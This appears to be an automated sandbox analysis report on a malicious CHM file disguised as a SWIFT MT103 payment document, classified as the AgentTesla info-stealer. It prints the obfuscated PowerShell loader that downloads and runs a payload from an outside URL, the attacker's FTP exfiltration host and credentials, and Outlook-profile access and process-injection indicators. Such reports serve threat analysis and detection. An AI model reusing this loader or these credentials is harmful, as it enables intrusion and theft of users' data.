Analysis
-
max time kernel
141s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
07-12-2022 09:44
Static task
static1
Behavioral task
behavioral1
Sample
Swift0002747775 MT103 000348586.chm
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Swift0002747775 MT103 000348586.chm
Resource
win10v2004-20220812-en
General
-
Target
Swift0002747775 MT103 000348586.chm
-
Size
15KB
-
MD5
0d9ab32a173a23705f26b33c9776a8dd
-
SHA1
6b06f0fa7411ac7b01807dd526508ed37facf4e2
-
SHA256
5326f9691f9a304973414ea552cf71c21bccdaaf3899661de4ad647ba16c91aa
-
SHA512
8d229a5af217e53a522880becb68680a325b5474683798a4812640dba8c4933ca718b1485d99aef9b31b3790914fe1024ccb05abd4a503e88af998e36a93c9bd
-
SSDEEP
192:L7aJtYxFm/3gPdpkEmg45HKGBWTY1/Qxl31:L7aJtYxFqgPjkx5HlBWk1/+31
Malware Config
Extracted
http://stpindo.co.id/ck12.txt
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.mgcpakistan.com - Port:
21 - Username:
[email protected] - Password:
boygirl123456
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 6 668 powershell.exe 7 668 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 668 powershell.exe 668 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 668 set thread context of 1320 668 powershell.exe InstallUtil.exe -
Processes:
hh.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeInstallUtil.exepid process 668 powershell.exe 1320 InstallUtil.exe 1320 InstallUtil.exe 1320 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 668 powershell.exe Token: SeIncreaseQuotaPrivilege 668 powershell.exe Token: SeSecurityPrivilege 668 powershell.exe Token: SeTakeOwnershipPrivilege 668 powershell.exe Token: SeLoadDriverPrivilege 668 powershell.exe Token: SeSystemProfilePrivilege 668 powershell.exe Token: SeSystemtimePrivilege 668 powershell.exe Token: SeProfSingleProcessPrivilege 668 powershell.exe Token: SeIncBasePriorityPrivilege 668 powershell.exe Token: SeCreatePagefilePrivilege 668 powershell.exe Token: SeBackupPrivilege 668 powershell.exe Token: SeRestorePrivilege 668 powershell.exe Token: SeShutdownPrivilege 668 powershell.exe Token: SeDebugPrivilege 668 powershell.exe Token: SeSystemEnvironmentPrivilege 668 powershell.exe Token: SeRemoteShutdownPrivilege 668 powershell.exe Token: SeUndockPrivilege 668 powershell.exe Token: SeManageVolumePrivilege 668 powershell.exe Token: 33 668 powershell.exe Token: 34 668 powershell.exe Token: 35 668 powershell.exe Token: SeDebugPrivilege 1320 InstallUtil.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 1552 hh.exe 1552 hh.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
hh.exepowershell.exedescription pid process target process PID 1552 wrote to memory of 668 1552 hh.exe powershell.exe PID 1552 wrote to memory of 668 1552 hh.exe powershell.exe PID 1552 wrote to memory of 668 1552 hh.exe powershell.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe PID 668 wrote to memory of 1320 668 powershell.exe InstallUtil.exe -
outlook_office_path 1 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe -
outlook_win_path 1 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\Swift0002747775 MT103 000348586.chm"1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'http' + '://stpindo.co.id/ck12.txt')|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1320
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Users\Admin\AppData\Local\Temp\6fa7e56d-5a67-4728-a5db-c67fd5cf7763\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
\Users\Admin\AppData\Local\Temp\f1c816ee-9c5b-4ee5-8939-4ab00a42e9d3\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
memory/668-60-0x000000001B6F0000-0x000000001B9EF000-memory.dmpFilesize
3.0MB
-
memory/668-73-0x0000000002444000-0x0000000002447000-memory.dmpFilesize
12KB
-
memory/668-58-0x000007FEEE680000-0x000007FEEF1DD000-memory.dmpFilesize
11.4MB
-
memory/668-75-0x000000000244B000-0x000000000246A000-memory.dmpFilesize
124KB
-
memory/668-61-0x000000000244B000-0x000000000246A000-memory.dmpFilesize
124KB
-
memory/668-62-0x0000000002444000-0x0000000002447000-memory.dmpFilesize
12KB
-
memory/668-57-0x000007FEEF8E0000-0x000007FEF0303000-memory.dmpFilesize
10.1MB
-
memory/668-64-0x000007FEEF750000-0x000007FEEF8D4000-memory.dmpFilesize
1.5MB
-
memory/668-55-0x0000000000000000-mapping.dmp
-
memory/668-59-0x0000000002444000-0x0000000002447000-memory.dmpFilesize
12KB
-
memory/1320-66-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1320-69-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1320-70-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1320-72-0x0000000000437AEE-mapping.dmp
-
memory/1320-71-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1320-67-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1320-76-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1320-78-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1320-79-0x0000000075C81000-0x0000000075C83000-memory.dmpFilesize
8KB
-
memory/1552-54-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmpFilesize
8KB